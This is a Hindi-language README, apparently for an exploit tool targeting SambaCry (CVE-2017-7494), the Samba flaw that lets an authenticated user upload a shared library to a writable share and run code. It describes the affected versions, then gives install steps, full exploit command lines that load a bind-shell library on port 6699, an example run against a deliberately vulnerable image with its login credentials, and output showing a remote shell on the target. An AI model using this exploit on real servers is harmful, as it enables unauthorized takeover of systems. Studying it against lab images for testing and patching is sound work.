
SambaCry एक्सप्लॉइट (CVE-2017-7494)
Samba, SMB/CIFS नेटवर्किंग प्रोटोकॉल का एक मुफ्त सॉफ्टवेयर पुनः-कार्यान्वयन है। Samba विभिन्न Microsoft Windows क्लाइंट के लिए फ़ाइल और प्रिंट सेवाएं प्रदान करता है और Microsoft Windows Server डोमेन के साथ एकीकृत हो सकता है, या तो डोमेन कंट्रोलर (DC) के रूप में या डोमेन सदस्य के रूप में। संस्करण 4 के अनुसार, यह Active Directory और Microsoft Windows NT डोमेन का समर्थन करता है।
Samba 4.5.9 संस्करण और उससे पहले के संस्करण SambaCry नामक एक रिमोट कोड निष्पादन भेद्यता के लिए संवेदनशील हैं। CVE-2017-7494 रिमोट प्रमाणित उपयोगकर्ताओं को एक लिखने योग्य साझा फ़ोल्डर में एक साझा लाइब्रेरी अपलोड करने और कमजोर Samba सेवाओं को होस्ट करने वाले सर्वरों पर नियंत्रण लेने के लिए कोड निष्पादन हमले करने की अनुमति देता है।
Samba 3.x (3.5.0 के बाद) और 4.x (4.4.14 से पहले), 4.5.x (4.5.10 से पहले), और 4.6.x (4.6.4 से पहले) Windows नामित पाइप का उपयोग करते समय फ़ाइल पथ को प्रतिबंधित नहीं करता है, जो रिमोट प्रमाणित उपयोगकर्ताओं को एक लिखने योग्य साझा फ़ोल्डर में एक साझा लाइब्रेरी अपलोड करने और एक क्राफ्टेड नामित पाइप के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देता है।
इस शोषण के लिए वातावरण सेटअप करने के लिए poetry का उपयोग करें
pip3 install -r requirements.txt
उसके बाद आप इसे निम्नानुसार चला सकते हैं:
./exploit -t <target> -e libbindshell-samba.so \
-s <share> -r <location>/libbindshell-samba.so \
-u <user> -p <password> -P 6699
उदाहरण के लिए, यदि आप vulnerables/cve-2017-7494 से कमजोर इमेज का उपयोग करते हैं और इसके विरुद्ध इस शोषण को चलाना चाहते हैं:
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
और आपको निम्न आउटपुट मिलेगा
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
इस प्रोजेक्ट का पेलोड, कोड के साथ, opsxcq/exploit-CVE-2017-7494 से काफी प्रेरित था।